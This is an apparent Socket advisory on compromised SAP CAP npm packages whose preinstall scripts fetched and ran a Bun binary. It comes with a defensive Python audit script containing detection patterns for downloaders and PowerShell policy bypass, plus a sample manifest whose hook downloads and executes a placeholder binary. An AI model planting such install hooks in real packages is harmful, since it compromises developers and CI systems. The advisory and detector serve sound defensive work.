Socket's threat research team has identified a supply chain attack targeting multiple SAP CAP npm packages. Compromised versions of mbt, @cap-js/sqlite, @cap-js/postgres, and @cap-js/db-service introduced a preinstall script that downloads and executes an unverified Bun binary from GitHub Releases. The download follows HTTP redirects without validating where they lead, and on Windows the script runs PowerShell with ExecutionPolicy Bypass. Combined weekly downloads of the affected packages exceed 570,000. All suspicious versions were published on April 29, 2026, within a few hours of one another. Developers are advised to audit dependency trees, avoid the affected versions, rotate exposed credentials, and review CI/CD logs for unexpected binary execution.
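As an added example (not Socket's tooling or code from the affected packages), the following Python script audits a dependency tree for the two signals described above: a package named in the advisory, and an install-time lifecycle script that fetches from GitHub Releases, calls a downloader, runs PowerShell with ExecutionPolicy Bypass, or invokes a Bun binary. The compromised version numbers are not given on this page, so the name match flags the package for manual version review; the sample manifests, URL and version string are constructed placeholders.

```python
import json
import re
from pathlib import Path

# Packages named in the advisory. Their compromised version numbers are not on
# the page, so any installed copy is flagged for manual version review.
ADVISORY_PACKAGES = {"mbt", "@cap-js/sqlite", "@cap-js/postgres", "@cap-js/db-service"}

# Heuristics for the install-time behaviour described in the advisory: a
# lifecycle script that downloads a binary from GitHub Releases and runs
# PowerShell with ExecutionPolicy Bypass. Expect some benign matches.
SUSPICIOUS_PATTERNS = [
    re.compile(r"github\.com/[^ \"']+/releases/download", re.I),
    re.compile(r"-?ExecutionPolicy\s+Bypass", re.I),
    re.compile(r"\b(curl|wget|Invoke-WebRequest|iwr)\b", re.I),
    re.compile(r"\bbun(\.exe)?\b", re.I),
]
LIFECYCLE_HOOKS = ("preinstall", "install", "postinstall")

def audit_manifest(manifest: dict) -> list[str]:
    """Return findings for one parsed package.json (empty list if clean)."""
    findings = []
    name = manifest.get("name", "<unnamed>")
    if name in ADVISORY_PACKAGES:
        findings.append(f"{name}: listed in the SAP CAP advisory; verify the installed version")
    scripts = manifest.get("scripts", {})
    for hook in LIFECYCLE_HOOKS:
        cmd = scripts.get(hook)
        if not cmd:
            continue
        hits = [p.pattern for p in SUSPICIOUS_PATTERNS if p.search(cmd)]
        if hits:
            findings.append(f"{name}: {hook} script matches {len(hits)} pattern(s): {cmd!r}")
    return findings

def audit_tree(root: Path) -> list[str]:
    """Walk every package.json under root (e.g. a project's node_modules)."""
    findings = []
    for pj in root.rglob("package.json"):
        try:
            findings.extend(audit_manifest(json.loads(pj.read_text(encoding="utf-8"))))
        except (OSError, ValueError):
            continue  # unreadable or malformed manifest; skip rather than abort
    return findings

# Constructed sample manifests; the URL and version are placeholders, not real values.
BENIGN = {"name": "left-pad", "version": "1.0.0", "scripts": {"test": "node test.js"}}
SUSPECT = {"name": "@cap-js/sqlite", "version": "0.0.0-placeholder", "scripts": {
    "preinstall": "powershell -ExecutionPolicy Bypass -c \"iwr https://github.com/example/example/releases/download/v1/bun.exe -OutFile bun.exe; ./bun.exe\""}}

if __name__ == "__main__":
    for finding in audit_manifest(SUSPECT) + audit_manifest(BENIGN):
        print(finding)
```

Run `audit_tree(Path("node_modules"))` in a project checkout or CI job to list packages whose install hooks deserve inspection; a match is a prompt for review, not proof of compromise.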

From socket.dev